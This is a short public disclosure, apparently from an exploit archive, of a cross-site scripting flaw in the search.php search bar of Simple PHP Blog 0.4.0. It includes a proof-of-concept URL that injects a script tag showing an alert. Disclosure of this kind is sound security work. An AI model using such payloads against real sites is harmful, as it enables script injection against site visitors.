Home / exploits Simple PHP Blog 0.4.0 Cross Site Scripting
Posted on 30 November -0001
<HTML><HEAD><TITLE>Simple PHP Blog 0.4.0 Cross Site Scripting</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>[+] Credits: Boumediene KADDOUR AKA sh311c0d3r [+] Website: http://www.pentestingskills.com Vendor: ====================== http://www.simpleblogphp.com Product: =============================== Simple PHP Blog 0.4.0 Vulnerability Type: ============================= Cross Site Scripting (XSS) CVE Reference: ============== N/A Vulnerability Details: ===================== The search bar on the search.php script doesn't properly sanitize user supplied data, which causes the script to be prone to a cross site scripting that in turns allows an attacker to execute JS instructions on the client side. Exploit code(s): ================ http://192.168.43.167/internal/blog/search.php?q=%3Cscript%3Ealert%28%22SickApp%22%29%3C%2Fscript%3E Disclosure: ============================================= November 07/11/2016 : Public Disclosure sh311c0d3r </BODY></HTML>